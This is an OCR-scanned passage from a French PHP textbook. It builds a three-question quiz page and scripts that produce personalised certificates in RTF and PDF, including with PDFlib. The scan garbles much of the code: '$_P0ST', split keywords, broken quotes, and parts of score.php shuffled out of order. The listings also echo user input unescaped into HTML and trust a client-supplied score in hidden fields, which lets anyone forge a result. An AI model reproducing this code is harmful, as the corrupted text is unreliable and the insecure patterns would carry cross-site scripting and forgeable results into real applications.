Le fichier index.html est assez simple. II doit contenir un formulaire HTML permettant 
a l'utilisateur de saisir son nom et de repondre aux questions. Pour une veritable appli- 
cation de certification, il faudrait aller chercher ces questions dans une base de donnees 
mais, comme nous nous interessons ici a la creation du certificat, nous pouvons nous 
contenter de coder ces questions directement dans le formulaire HTML. 

Le champ name est un champ de saisie de texte. Chaque question est accompagnee de 
trois cases permettant a l'utilisateur d'indiquer son choix. Le bouton d'envoi de ce 
formulaire est une image de bouton. 

Le code de cette page est presente dans le Listing 30. 1 . 

Listing 30.1 : index.html — La page HTML contenant les questions du QCM 

<html> 
<body> 

<h 1 ><p align="center"> 

<img src="rosette.gif " alt=""> 
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Certification 

<img src=" rosette .gif " alt=" "></p></h1> 
<p>You too can earn your highly respected PHP certification 

from the world famous Fictional Institute of PHP 

Certification . </p> 
<p>Simply answer the questions below:</p> 

<form action="score.php" method="post"> 

<p>Your Name <input type="text" name="name" /></p> 

<p>What does the PHP statement echo do?</p> 
<ol> 

<li><input type="radio" name="q1" value="1" /> 

Outputs strings .</li> 
<li><input type=" radio" name="q1" value="2" /> 

Adds two numbers together. </li> 
<li><input type=" radio" name="q1" value="3" /> 

Creates a magical elf to finish writing your 

code.</li> 

</ol> 

<p>What does the PHP function cos() do?</p> 
<ol> 

<li><input type="radio" name="q2" value="1" /> 

Calculates a cosine in radians. </li> 
<li><input type=" radio" name="q2" value="2" /> 

Calculates a tangent in radians. </li> 
<li><input type=" radio" name="q2" value="3" /> 

It is not a PHP function. It is a lettuce. </li> 

</ol> 

<p>What does the PHP function mail() do?</p> 
<ol> 

<li><input type="radio" name="q3" value="1" /> 

Sends a mail message. 
<li><input type=" radio" name="q3" value="2" /> 

Checks for new mail. 
<li><input type=" radio" name="q3" value="3" /> 

Toggles PHP between male and female mode. 

</ol> 

<p align="center"><input type="image" src="certify-me.gif " 

border="0"></p> 



</f orm> 
</body> 
</html> 
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La Figure 30.2 presente cette page chargee dans un navigateur web. 



Figure 30.2 

La page index.html 
demande a I'utilisateur 
de repondre aux questions 
du QCM. 
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Evaluation des reponses 

Lorsque I'utilisateur envoie ses reponses en validant le formulaire de index.html, nous 
devons les evaluer et calculer sa note. Cette tache revient au script score.php, dont le 
code se trouve dans le Listing 30.2. 

Listing 30.2 : score.php — Ce script calcule la note des utilisateurs 



<?php 

// Creation de variables aux noms courts 
$q1 = $_P0ST[ ' q1 1 ] ; 
$q2 = $_P0ST[ ' q2 ' ] ; 
$q3 = $_P0ST[ ' q3 ' ] ; 
$name = $_P0ST[ ' name ' ] ; 

// Verifie qu'on a regu toutes les donnees 
if(($q1==") || ($q2==") || ($q3==") || ($name==")) { 
echo "<h1> 

<p align=\ "center\ "> 

<img src=\"rosette.gif \" alt=\"\" /> 

Sorry: 

<img src=\ "rosette.gif \" alt=\"\" /></p></h1> 
<p>You need to fill in your name and answer all 
questions. </p>" ; 

} else { 

// Additionne les scores 
$score = 0; 
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if ($q1 == 1) { 
// La reponse 
$score++; 



correcte a q1 est 1 



} 



if($q2 == 1) { 
// La reponse 
$score++; 



correcte a q2 est 1 



} 



if($q3 == 1) { 
// La reponse 
$score++; 



correcte a q3 est 1 



} 



// Convertit le score en pourcentage 
$score = $score / 3 * 100; 

if($score < 50) { 

// Cette personne a echoue 
echo "<h1> 

<p align=\ "center\ "> 

<img src=\"rosette.gif \" alt=\"\" /> 

Sorry: 

<img src=\ "rosette.gif \" alt=\"\" /></p></h1> 
<p>You need to score at least 50% to pass the 



// Creation d'une chaine contenant le score avec un seul 
// chiffre apres la virgule. 
$score = number_f ormat ($score , 1); 
echo "<h1 align=\ "center\ "> 

<img src=\ " rosette. gif\" alt=\"\" /> 

Congratulations ! 

<img src=\"rosette.gif \" alt=\"\" /></h1> 

<p>Well done ".$name.", with a score of ".$score."%, 
you have passed the exam.</p>"; 

// Fournit des liens vers les scripts qui produisent les 
// certificats. 

echo "<p>Please click here to download your certificate as 
a Microsoft Word (RTF) file.</p> 
<form action=\"rtf .php\" method=\ "post\ "> 
<div align=\ "center\ "> 

<input type=\ "image\ " src=\ " certificate . gif\ " 
border=\"0\"> 

</div> 

<input type=\"hidden\" name=\ "score\ " 

value=\" " .$score. "\"/> 
<input type=\"hidden\" name=\ "name\ " 

value=\" " .$name. "\"/> 

</f orm> 

<p>Please click here to download your certificate as 
a Portable Document Format (PDF) file.</p> 
<form action=\"pdf .php\" method=\ "post\ "> 
<div align=\ "center\ "> 



exam.</p>" ; 



} else { 
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<input type=\ "image\ " src=\ " certificate . gif\ " 
border=\"0\"> 

</div> 

<input type=\"hidden\" name=\ "score\ " 

value=\" " .$score. " \ " /> 
<input type=\"hidden\" name=\ "name\ " 

value=\" " .$name. " \ "/> 

</f orm> 

<p>Please click here to download your certificate as 
a Portable Document Format (PDF) file generated with 
PDFLib.</p> 

<form action=\ "pdf lib. php\ " method=\ "post\ "> 
<div align=\ "center\ "> 

<input type=\ "image\ " src=\ " certificate . gif\ " 
border=\ "0\ "> 

</div> 

<input type=\"hidden\" name=\ "score\ " 

value=\" " .$score. "\"/> 
<input type=\"hidden\" name=\ "name\ " 

value=\ " " .$name . " \ "/> 
</f orm>" ; 

} 

} 

?> 



Ce script affiche un message si l'utilisateur n'a pas repondu a toutes les questions ou 
s'il a fait trop de fautes pour recevoir son certificat. 

Si l'utilisateur a repondu correctement aux questions, il a le droit de produire son certi- 
ficat. La Figure 30.3 presente la page qui est alors affichee. 



Figure 30.3 

Le script score. php 
propose aux utilisa- 
teurs qui ont reussi 
I'examen de choisir 
I'un des trois 
certificats. 



File Edit View History Bookmarks Tools Help 
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Congratulations ! 



Wett done Jane Doe, with a score of 100. Q B o, you have passed the exam. 
Please click here to download your certificate as a Microsoft Word (RTF) file. 



Please click here to download your certificate as a Portable Document Format (PDF) file. 



■a 



Please click here to download your certificate as a Portable Document Format [PDF) file generated with PDFLib. 



Done 
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Sur cette page, l'utilisateur doit choisir entre trois options. II peut demander un certifi- 
cat au format RTF, ou l'un des deux certificats au format PDF. Nous allons maintenant 
nous interesser aux scripts correspondants. 

Production du certificat RTF 

Rien ne nous empeche de creer le certificat RTF en ecrivant du texte ASCII dans un 
fichier ou dans une chame, mais cela impliquerait de connaitre la syntaxe RTF. 

Voici un exemple de document RTF : 
{\rtf1 

{\fonttbl {\f0 Arial;}{\f1 Times New Roman;}} 

\f0\fs28 En-tete\par 

\f1\fs20 Ceci est un document RTF.\par 

} 

Ce document defmit un tableau de polices contenant deux polices : Arial (f 0) et Times 
New Roman (f1). On ecrit ensuite le texte En tete avec f0 {Arial) et la taille 28 
(14 points). Le mot-cle de controle \par indique un changement de page. Nous ecri- 
vons ensuite Ceci est un document RTF. avec la police f 1 {Times New Roman) et la 
taille 20 (10 points). 

Nous pourrions produire ce type de document manuellement, mais il n'existe aucune 
fonction integree dans PHP pour faciliter la gestion des elements complexes, comme 
les graphiques. Heureusement, dans la plupart des documents, la structure, le style et 
l'essentiel du texte sont statiques et seules de petites parties changent d'une personne a 
1' autre. II serait done bien plus efficace de passer par un modele. 

Nous pouvons construire facilement un document complexe, comme celui de la 
Figure 30.4, a l'aide d'un traitement de texte. 

Notre modele contient des mots-cles comme «NAME», qui seront remplaces par les 
donnees dynamiques. Leur apparence n'a pas d'importance, puisqu'ils doivent etre 
modifies par la suite. Nous avons simplement choisi un nom descriptif encadre de 
chevrons. II est cependant important de choisir des mots-cles qui n'ont aucune chance 
d'apparaitre ailleurs dans le texte. La mise en forme du document peut etre simplifiee si 
ces mots-cles ont approximativement la meme longueur que les donnees dynamiques 
qui les remplaceront. 

Les mots-cles de notre document sont «NAME», «Name», «score» et «mm/dd/ 
yyyy». Vous remarquerez que nous nous servons des mots-cles NAME et Name, puisque 
nous effectuerons une recherche respectant la casse pour les remplacer. 

Maintenant que nous disposons d'un modele, il nous reste a le personnaliser avec un 
script. Ce script s'appelle rtf.php et son code se trouve dans le Listing 30.3. 
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Listing 30.3 : rtf.php — Ce script produit les certificats RTF personnalises 



<?php 

// Creation de variables aux noms courts 
$name = $_P0ST[ 1 name ' ] ; 
$score = $_P0ST[ 1 score '] ; 

// Verifie que nous disposons des parametres necessaires 

if ( !$name | | !$score) { 
echo "<h1>Error:</h1> 

<p>This page was called incorrectly</p>" ; 
} else { 

// Produit des en-tetes pour aider le navigateur a choisir la 
// bonne application 

header( 1 Content-type : application/msword ' ) ; 

header( 1 Content-Disposition : inline, f ilename=cert . rtf ' ) ; 

$date = date( ' F d, Y' ) ; 

// Ouvre le fichier modele 
$filename = 'PHPCertification.rtf 1 ; 
$fp = fopen ($filename, 'r'); 

// Stocke le modele dans une variable 
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$output = fread( $fp, f ilesize($f ilename) ) ; 
f close ($fp); 

// Remplace les marqueurs du modele par nos donnees 

$output = str_replace( '«NAME»' , strtoupper($name) , $output); 

$output = str_replace( '«Name»' , $name, $output); 

$output = str_replace( '«score»' , $score, $output); 

$output = str_replace( 1 «mm/dd/yyyy» ' , $date, $output); 

// Envoie le document produit au navigateur 
echo $output; 

} 

?> 



Ce script effectue quelques verifications assez simples permettant de s' assurer que 
toutes les informations de l'utilisateur ont ete transmises, puis il s'occupe de creer le 
certificat. 

Comme la sortie de ce script est un fichier RTF et non un fichier HTML, nous devons en 
avertir le navigateur de l'utilisateur. Cette etape est tres importante pour que le naviga- 
teur puisse ouvrir ce fichier avec 1' application adequate ou afficher une boite de dialogue 
Enregistrer sous. . ., si l'extension RTF n'est pas reconnue. 

Nous precisons le type MIME du fichier genera grace a la fonction header ( ) de PHP, 
pour envoyer l'en-tete HTTP approprie, comme ceci : 

header( 'Content-type: application/msword ' ); 

header( 'Content-Disposition: inline, f ilename=cert . rtf ' ) ; 

Le premier en-tete indique au navigateur que nous envoyons un fichier Microsoft Word 
(ce qui n'est pas tout a fait exact, mais il s'agit de l'application qui a le plus de chance 
de pouvoir ouvrir un fichier RTF). 

Le second en-tete demande au navigateur d' afficher automatiquement le contenu du 
fichier, sous le nom cert. rtf. II s'agit du nom de fichier qui sera propose par defaut a 
l'utilisateur si ce dernier tente d'enregistrer le fichier a partir de son navigateur. 

Apres avoir envoye les en-tetes, nous ouvrons et lisons le fichier du modele RTF, nous 
le placons dans la variable $output et nous nous servons de la fonction str replace ( ) 
pour remplacer les mots-cles par les donnees appropriees. La ligne : 

$output = str_replace( ' «Name» ' , $name, $output ); 

remplace toutes les occurrences du mot-cle «Name» par le contenu de la variable 
$name. 
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Apres avoir effectue ces substitutions, il reste a afficher le resultat dans le navigateur. Le 
resultat de ce script est presente a la Figure 30.5. 



Figure 30.5 



Le script rtf.php 
genere un certificat 
a partir d'un modele 
RTF. 




Cette approche fonctionne tres bien. Les appels a la fonction str replace () sont tres 
rapides, bien que le contenu de notre modele et celui de $output soient assez longs. Le 
probleme principal, du point de vue de notre application, est que l'utilisateur doit char- 
ger le certificat dans son traitement de texte pour pouvoir rimprimer. Certaines person- 
nes seront done tentees de le falsifier car le format RTF ne permet pas de produire des 
documents accessibles en lecture seulement. 



Production d'un certificat PDF a partir d'un modele 

La production d'un certificat PDF a partir d'un modele est tres comparable. La diffe- 
rence principale reside dans le fait que, lorsque nous creons le fichier PDF, certains de 
nos mots-cles peuvent etre interpretes comme des codes de formatage selon la version 
d'Acrobat que vous utilisez. Par exemple, si nous examinons le modele de certificat que 
nous avons cree (en utilisant un editeur de texte), nous pouvons voir que les mots-cles 
ressemblent maintenant a ceci : 

«N)-13(AME)-10(>)-6(> 

«Na)-9(m)0(e)-18(» 

<)-11 (<)1 (sc)-17(or)-6(e)-6(>)-11 (> 

<)-11(<)1(m)-12(m)0(/d)-6(d)-19(/)1(yy)-13(yy)-13(» 

Si vous parcourez le fichier, vous constaterez que, a la difference du format RTF, il ne 
s'agit pas d'un format directement lisible. 



790 Partie V 



Creer des projets avec PHP et MySQL 



— Info 

Le format du fichier de modele PDF peut varier selon la version d'Acrobat ou de tout autre 
outil de production de PDF que vous utilisez. Le code fourni dans cet exemple peut ne pas 
fonctionner comme indique lorsque vous produisez vos propres modeles. Si c'est le cas, veri- 
fiez votre modele et adaptez le code en consequence. Si vous rencontrez toujours des 
problemes, utilisez I'exemple PDFlib propose plus loin dans ce chapitre. 



Nous pouvons contourner ce probleme de plusieurs manieres. 

Nous pouvons parcourir chacun de ces mots-cles et supprimer les codes de forma- 
tage. Cela ne change pas grand-chose a l'apparence finale du document, puisque les 
codes integres dans le document precedent indiquent la faille des mots a remplacer. 
Cependant, si nous choisissons cette approche, nous devrons modifier manuellement 
le fichier PDF et repeter cette modification a chaque fois que nous devrons changer 
ou mettre a jour le fichier. Cela ne represente pas trop de travail pour quatre mots- 
cles, mais peut tourner au cauchemar si nous devons traiter plusieurs documents 
contenant beaucoup de mots-cles et si vous decidez apres coup de modifier l'en-tete 
du document. 

Nous pouvons done utiliser une autre technique consistant a se servir d'Acrobat pour 
creer un formulaire PDF analogue au formulaire HTML, comprenant des champs de 
texte vides. II suffit alors de se servir d'un script PHP pour creer ce que Ton appelle un 
fichier FDF (Forms Data Format), qui est simplement un ensemble de donnees qui 
doivent etre fusionnees avec un modele. Vous pouvez creer des fichiers FDF a l'aide de 
la bibliotheque de fonctions FDF de PHP : la fonction f df create ( ) permet de creer 
un fichier, la fonction fdf set value () permet de definir la valeur des champs et la 
fonction fdf set file() permet de choisir le fichier correspondant au formulaire 
modele. Vous pouvez ensuite passer ce fichier au navigateur avec le type MIME appro- 
prie, e'est-a-dire, ici, vnd.fdf, et le plug-in Acrobat Reader du navigateur doit remplacer 
les donnees dans le formulaire. 

II s'agit d'une approche assez propre, mais elle possede deux limitations. Tout d'abord, 
vous devez posseder Acrobat Professionnel (la version complete et non le lecteur gratuit 
ou l'edition Standard). Ensuite, il est plus difficile de remplacer du texte en plein milieu 
d'une ligne que du texte place dans un champ de formulaire. Cela peut poser un 
probleme ou non, en fonction de ce que vous souhaitez faire. Nous utilisons souvent la 
generation de documents PDF pour creer des documents dans lesquels plusieurs 
elements doivent etre remplaces en plein milieu d'une ligne et les fonctions FDF ne 
sont pas tres adaptees pour ce travail. Si, en revanche, vous voulez creer un formulaire 
dont les champs se remplissent automatiquement, comme un formulaire de calcul de 
taxes, ce n'est pas un probleme. 
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Vous trouverez plus d' informations sur le format FDF sur le site d'Adobe, http:// 
www.adobe.com/devnet/acrobat/fdftoolkit.htmI. Nous vous recommandons aussi de 
consulter la documentation de FDF dans le manuel de PHP si vous choisissez cette 
approche : http://www.php.net/manual/fr/ref.fdf.php. 

Revenons maintenant a l'etude de la solution de notre probleme precedent. 

Nous pouvons toujours trouver et remplacer les mots-cles dans notre fichier PDF si 
nous acceptons que les codes de format supplementaires ne soient composes que de 
tirets, de chiffres et de parentheses et si nous pouvons les identifier avec des expressions 
regulieres. Nous avons ecrit une fonction, pdf replace ( ), pour produire automatique- 
ment une expression reguliere correspondant a un mot-cle et pour le remplacer par le 
texte approprie. 

Notez qu'avec certaines versions d' Acrobat les caracteres de remplacement sont en 
texte brut et que vous pouvez alors les remplacer avec str replace ( ) , comme vous le 
faisiez auparavant. 

Ceci mis a part, le code pour la production du certificat en passant par un modele PDF 
est tres semblable a la version RTF. Ce script est presente dans le Listing 30.4. 

Listing 30.4 : pdf.php — Ce script genere des certificats PDF personnalises a partir d'un 
modele 



<?php 

set_time_limit(180) ; // Ce script peut etre lent 

// Creation de variables aux noms courts 
$name = $_P0ST[ ' name ' ] ; 
$score = $_POST[ ' score '] ; 

function pdf_replace ($pattern , $replacement , $string) { 
$len = strlen( $pattern ); 
$regexp = ' ' ; 

for ($i = 0; $i<$len; $i++) { 
$regexp .= $pattern[$i] ; 
if ($i<$len-1) { 
$regexp .= " (\) \-{0,1}[0-9]*\ ( ){0,1}" ; 

} 

} 

return ereg_replace ( $regexp, $replacement , $string ); 

} 

if ( !$name | | !$score) { 
echo "<h1>Error:</h1> 

<p>This page was called incorrectly</p>" ; 

} else { 

// Production des en-tetes pour aider le navigateur a choisir 
// la bonne application 

header( 1 Content-Disposition : f ilename=cert . pdf ' ) ; 



792 Partie V 



Creer des projets avec PHP et MySQL 



header( ' Content-type : application/pdf ' ) ; 

$date = date( 'F d, Y' ) ; 

// Ouverture du fichier modele 

$filename = 'PHPCertification.pdf; 

$fp = fopen ($filename, 'r'); 

// Stockage du modele dans une variable 

$output = fread($fp, f ilesize ($f ilename) ) ; 

fclose ($fp); 

// Remplace les marqueurs du modele par nos donnees 

$output = pdf_replace( '«NAME»' , strtoupper($name) , $output); 

$output = pdf_replace( '«Name»' , $name, $output); 

$output = pdf_replace( '«score»' , $score, $output); 

$output = pdf_replace( 1 «mm/dd/yyyy» ' , $date, $output); 

// Envoi le document produit au navigateur 

echo $output; 

} 

?> 



Ce script genera une version personnalisee de notre document PDF. Ce document, 
presente a la Figure 30.6, devrait produire une version imprimee uniforme sur la plupart 
des systemes et il est assez difficile a modifier. Vous pouvez constater que le document 
PDF de la Figure 30.6 est quasiment identique au document RTF de la Figure 30.5. 



Figure 30.6 

pdf.php produit un 
certificat a partir 
d'un modele PDF. 
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PHP Certification 



This is to certify that: 
JANIi IJtJIi 

has demonstrated that they are certifiable by passing a rigorous exam 
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Jans- D(h j ohliisju'thi sriffp cif 100.0%. 

The test was set and overseen by the 
Fictional Institute of PHP Certification 
on July 20, 2008, 




Authorised by; ^ J^l^^^ 
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L'un des problemes de cette approche est que le code est assez lent a cause des compa- 
raisons a base d' expressions regulieres. Les operations realisees avec des expressions 
regulieres sont bien plus lentes que la fonction str replace ( ) , dont nous nous servions 
dans la version RTF. 

Si vous avez l'intention de remplacer un grand nombre de mots-cles, ou de produire 
plusieurs documents de ce type sur un meme serveur, il peut etre interessant de choisir 
une autre approche. Ce probleme ne serait pas vraiment important si votre modele etait 
assez simple. L'essentiel des donnees de ce fichier represente des images. 

Production d'un document PDF avec PDFlib 

La bibliotheque de fonctions PDFlib permet de produire des documents PDF dynami- 
ques via le Web. Cette bibliotheque ne fait pas strictement partie de PHP, puisqu'il 
s'agit d'une bibliotheque separee dont la plupart des fonctions peuvent etre appelees 
depuis un grand nombre de langages de programmation, comme C, C++, Java, Perl, 
Python, Tel et ActiveX/COM. 

PDFlib est officiellement prise en charge par PDFLib GmbH, ce qui signifie que vous 
pouvez soit consulter la documentation de PHP, disponible sur le site http:// 
www.php.net/en/manual/ref.pdf.php, soit telecharger la documentation officielle sur 
le site http://www.pdflib.com. 

Un script "Bonjour tout le monde" pour PDFlib 

Apres avoir recompile PHP en integrant PDFlib, vous pouvez tester votre nouvelle 
configuration avec un petit programme d'exemple, comme celui du Listing 30.5. 

Listing 30.5 : testpdf.php — L'exemple classique "Bonjour tout le monde" utilisant 
PDFlib via PHP 



<?php 

// Creation d'un document PDF en memoire 
$pdf = pdf_new( ) ; 
pdf_open_f ile($pdf , ""); 

pdf_set_inf o($pdf , "Auteur", "Luke Welling et Laura Thomson"); 
pdf_set_info($pdf , "Titre", "Bonjour tout le monde(PHP) " ) ; 
pdf_set_inf o($pdf , "Createur", "testpdf.php"); 
pdf_set_info($pdf , "Sujet", "Test PDF"); 

// Le format US Letter fait 8.5" x 11" et il y a 72 points par 
// pouce 

pdf_begin_page($pdf , 8.5*72, 11*72); 



// Ajoute un signet 
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pdf_add_bookmark($pdf , 'Page 1', 0, 0); 

$font = pdf_f indf ont ($pdf , 'Times-Roman', 'host', 0); 
pdf_setfont($pdf , $font, 24); 
pdf_set_text_pos($pdf , 50, 700); 

// Ecrit le texte 

pdf_show($pdf , 'Bonjour tout le monde !'); 
pdf_continue_text($pdf , ' (dit PHP) ' ) ; 

// Fin du document 
pdf_end_page($pdf ) ; 
pdf_close($pdf ) ; 

$data = pdf_get_buffer($pdf ) ; 

// Produit les en-tetes pour aider le navigateur a choisir la 
// bonne application 

header( 'Content-Type: application/pdf ' ) ; 

header( 'Content-Disposition: inline; f ilename=testpdf . pdf ' ) ; 
header( ' Content-Length : ' . strlen ($data) ) ; 

// Affiche le PDF 
echo $data; 



En cas de probleme, il est probable que l'erreur obtenue soit de la forme : 

Fatal error: Call to undefined function pdf_new() 
in C:\Program Files\Apache Software 

Group\Apache2.2\htdocs\phpmysql4e\chapitre30\testpdf .php 
on line 4 

Elle signifie que vous n'avez pas compile correctement PHP avec PDFlib ou que vous 
n'avez pas active l'extension. 

La procedure d' installation est assez simple, mais certains details peuvent changer en 
fonction de la version exacte de PHP et de PDFlib que vous utilisez. Nous vous 
conseillons de consulter les notes des utilisateurs sur la page de PDFlib, dans le manuel 
commente de PHP 

Lorsque ce script fonctionne correctement sur votre systeme, vous pouvez vous interesser 
a son fonctionnement. 

Les lignes : 

$pdf = pdf_new( ) ; 
pdf_open_file($pdf , ''); 

initialisent un document PDF en memoire. 
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La fonction pdf set info ( ) vous permet de baliser le document avec un sujet, un titre, 
un createur, un auteur, une liste de mots-cles et un champ personnalise defini par l'utili- 
sateur. 

Ici, vous definissez un auteur, un titre, un createur et un sujet. Notez que chacun des six 
champs d' information est facultatif : 

pdf_set_info($pdf , "Auteur", "Luke Welling et Laura Thomson"); 

pdf_set_info($pdf , "Titre", "Bonjour tout le monde(PHP) " ) ; 

pdf_set_info($pdf , "Createur", "testpdf . php" ) ; 

pdf_set_info($pdf , "Sujet", "Test PDF"); 

Les documents PDF sont constitues d'un certain nombre de pages. Pour demarrer une 
nouvelle page, vous devez appeler pdf begin page(). Outre l'identincateur renvoye par 
pdf open(), pdf begin page() requiert les dimensions de la page. Chaque page dans un 
document peut etre de taille differente, mais, a moins que vous n'ayez une bonne raison de 
proceder autrement, il est preferable d'opter pour un format de papier classique. 

PDFlib utilise comme mesure les points, a la fois pour la taille des pages et pour locali- 
ser les coordonnees sur chaque page. Pour information, le format A4 equivaut approxi- 
mativement a 595 points par 842 points et le format de lettre US, a 612 points par 
792 points. Cela signifie que la ligne : 

pdf_begin_page($pdf , 8.5*72, 11*72); 

cree une page dans le document au format US Letter. 

Les documents PDF ne doivent pas necessairement etre de simples documents impri- 
mables. Un grand nombre de fonctionnalites PDF peuvent etre incluses dans le docu- 
ment, comme des liens hypertextes et des signets. La fonction pdf add outline () 
ajoute un signet au document. Les signets dans un document apparaissent dans un 
panneau separe d' Acrobat Reader et vous permettent de passer directement d'une 
section a une autre. 

La ligne : 

pdf_add_bookmark($pdf , 'Page 1', 0, 0); 
ajoute un signet nomine Page 1 qui fait reference a la page courante. 

Les polices disponibles sur les systemes peuvent varier en fonction du systeme 
d'exploitation, voire d'un ordinateur a un autre. Pour garantir que le resultat sera 
uniforme, un ensemble de polices de base fonctionne avec chaque lecteur PDF. Les 
quatorze polices de base sont les suivantes : 

■ Courier ; 

■ Courier-Bold ; 

■ Courier-Oblique ; 
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■ Courier-BoldOblique ; 

■ Helvetica ; 

■ Helvetica-Bold ; 

■ Helvetica-Oblique ; 

■ Helvetica-BoldOblique ; 

■ Times-Roman ; 

■ Times-Bold ; 

■ Times-Italic ; 

■ Times-Boldltalic ; 

■ Symbol ; 

■ ZapfDingbats. 

Si vous choisissez d'autres polices que celles-ci, la taille du fichier augmentera de maniere 
importante et vous devrez penser a verifier la licence d' utilisation des polices choisies. 
Vous pouvez choisir une police, sa taille et l'encodage des caracteres de cette maniere : 

$font = pdf_f indf ont ($pdf , 'Times-Roman', 'host', 0); 
pdf_setfont($pdf , $font, 24); 

Les tailles des polices sont specinees en points. Ici, nous avons choisi l'encodage natif 
des caracteres ; les differentes valeurs possibles sont winansi, builtin, macroman, 
ebcdic ou host. Voici la signification de ces differentes valeurs : 

■ winansi. ISO 8859-1 plus certains caracteres speciaux ajoutes par Microsoft, 
comme le symbole de l'euro. 

■ builtin. Precise l'encodage integre dans la police. Cet encodage est normalement 
utilise avec les polices de symboles et les polices differentes du type latin. 

■ macroman. Encodage Mac Roman. II s'agit du jeu de caracteres par defaut des 
Macintosh. 

■ ebcdic. Encodage EBCDIC tel qu'il est utilise sur les systemes IBM AS/400. 

host. Selectionne automatiquement macroman sur un Macintosh, ebcdic sur un 
systeme EBCDIC, et winansi sur tous les autres systemes. 

Si vous n'avez pas besoin d'inclure des caracteres speciaux, le choix de l'encodage n'a 
aucune importance. 

Un document PDF presente quelques differences par rapport a un document HTML ou 
a un document de traitement de texte. Le texte ne commence pas par defaut en haut a 
gauche, pour continuer ligne apres ligne : il faut choisir l'endroit ou placer chaque ligne 
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de texte. Comme nous l'avons deja vu, le format PDF indique les emplacements en 
points. L'origine, dont les coordonnees cartesiennes sont (0,0), correspond au coin 
superieur gauche de la page. 

Puisque notre page fait 612 x 792 points, le point (50,70) se trouve environ a 2 cm du 
bord gauche de la page et a 1 cm du haut de la page. Pour defmir la position de notre 
texte, nous utilisons la ligne suivante : 

pdf_set_text_pos($pdf , 50, 700); 

Enfm, apres avoir configure la page, nous pouvons y ajouter du texte. Pour inserer une 
ligne de texte a la position courante et avec la police courante, nous utilisons la fonction 
pdf show(). 

La ligne : 

pdf_show($pdf , 'Bonjour tout le monde !'); 
ajoute le texte "Bon jour tout le monde !" dans notre document. 

Pour passer a la ligne suivante et ajouter du texte, nous utilisons la fonction 
pdf continue text (). Pour ajouter la chaine " (dit PHP) ", nous utilisons : 

pdf_continue_text($pdf , 1 (dit PHP) 1 ) ; 
L' emplacement exact de cette chaine sur la page depend de la police et de la taille selec- 
tionnees. Si vous utilisez des paragraphes contigus plutot que des lignes ou des phrases, 
la fonction pdf show boxed ( ) vous sera plus utile car elle vous permet de declarer un 
cadre dans lequel agencer du texte. 

Lorsque nous avons termine d' ajouter des elements dans la page, nous devons appeler 
pdf end page (), comme ceci : 

pdf_end_page($pdf ) ; 

Lorsque nous avons fmi de generer le document PDF, nous devons le fermer avec la 
fonction pdf close(). 

La ligne : 

pdf_close($pdf ) ; 
termine la production de notre document. 
On peut alors le transmettre au navigateur : 

$data = pdf_get_buffer($pdf ) ; 

// generate the headers to help a browser choose the correct application 
header( 'Content-Type: application/pdf ' ) ; 

header( 'Content-Disposition: inline; f ilename=testpdf . pdf ' ) ; 
header( ' Content-Length : ' . strlen ($data) ) ; 

// output PDF 
echo $data; 
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Vous pouvez egalement ecrire ces donnees sur disque en passant un nom de fichier 
comme second parametre a pdf open file ( ) . 

Notez que certains parametres des fonctions PDFlib qui sont documented dans le 
manuel PHP comme etant facultatifs sont en fait requis dans certaines versions de 
PDFlib. Le document que nous souhaitons produire pour le certificat est un peu plus 
complexe, puisqu'il contient une marge, une image vectorielle et une image bitmap. 
Avec les deux autres techniques, nous avions ajoute ces caracteristiques en utilisant 
notre traitement de texte. Avec PDFlib, nous devrons les ajouter manuellement. 

Production d'un certificat avec PDFlib 

Pour pouvoir utiliser PDFlib, nous avons choisi certains compromis. Bien qu'il soit 
certainement possible de dupliquer exactement le certificat que nous avions utilise 
precedemment, il faudrait beaucoup plus de travail pour produire et positionner chaque 
element manuellement, alors qu'il suffisait d'utiliser un outil comme Microsoft Word 
pour mettre en page le document. 

Nous voulons utiliser le meme texte que precedemment, y compris le cachet et la signa- 
ture bitmap, mais nous n'allons pas generer la bordure sophistiquee. Le code complet 
de ce script est presente dans le Listing 30.6. 

Listing 30.6 : pdflib.php — Generation de notre certificat avec PDFlib 

<?php 

// Creation de variables aux noms courts 
$name = $_P0ST[ 1 name ' ] ; 
$score = $_P0ST[ ' score '] ; 

if ( !$name | | !$score) { 

echo "<h1>Error:</h1> 

<p>This page was called incorrectly</p>" ; 
} else { 

$date = date( 'F d, Y' ) ; 

// Creation d'un document PDF en memoire 
$pdf = pdf_new( ) ; 
pdf_open_file($pdf , ""); 

// Fixe le nom de la police pour 1' utiliser plus tard 
$fontname = 'Times-Roman 1 ; 

// Configure la taille de la page en points et cree une page. 
// US letter fait 11" x 8.5" et il y a environ 72 points par 
// pouce 
$width = 11*72; 
$height = 8.5*72; 

pdf_begin_page($pdf , $width, $height); 
// Dessine les contours 
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$inset = 20; // Espace entre le contour et le bord de la page 
$border = 10; // Largeur de la ligne de contour principale 
Sinner = 2; // Espace a l'interieur du contour 

// Dessine le contour exterieur 
pdf_rect ($pdf , $inset-$inner, 

$inset-$inner , 

$width-2*($inset-$inner) , 

$height-2* ($inset-$inner) ) ; 
pdf_stroke($pdf ) ; 

// Dessine le contour principal, large de $border points 
pdf_setlinewidth($pdf , $border); 
pdf_rect($pdf , $inset+$border/2, 

$inset+$border/2, 

$width-2*($inset+$border/2) , 

$height-2*($inset+$border/2) ) ; 
pdf_stroke($pdf ) ; 
pdf_setlinewidth($pdf , 1.0); 

// Dessine le contour interieur 

pdf_rect ($pdf , $inset+$border+$inner, 
$inset+$border+$inner , 
$width-2*($inset+$border+$inner) , 
$height-2* ($inset+$border+$inner) ) ; 

pdf_stroke($pdf ) ; 

// Ajoute l'en-tete 

$font = pdf_findfont($pdf , $fontname, 'host', 0); 
if ($font) { 

pdf_setfont($pdf , $font, 48); 

} 

$startx = ($width - pdf_stringwidth ($pdf , 'PHP Certification', 

$font, '12'))/2; 
pdf_show_xy ($pdf , 1 PHP Certification 1 , $startx, 490); 

// Ajoute le texte 

$font = pdf_findfont($pdf , $fontname, 'host 1 , 0); 
if ($font) { 

pdf_setfont($pdf , $font, 26); 

} 

$startx = 70; 

pdf_show_xy ($pdf , 'This is to certify that:', $startx, 430); 
pdf_show_xy ($pdf , strtoupper ($name) , $startx+90, 391); 

$font = pdf_findfont($pdf , $fontname, 'host', 0); 
if ($font) 

pdf_setfont($pdf , $font, 20); 

pdf_show_xy ($pdf , 'has demonstrated that they are certifiable 
'by passing a rigorous exam', $startx, 340); 

pdf_show_xy ($pdf , 'consisting of three multiple choice 
questions.', $startx, 310); 

pdf_show_xy ($pdf , "$name obtained a score of $score ".'%.' , 
$startx, 260); 
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pdf_show_xy ($pdf , 'The test was set and overseen by the ', 
$startx, 210); 

pdf_show_xy ($pdf , 'Fictional Institute of PHP Certification', 

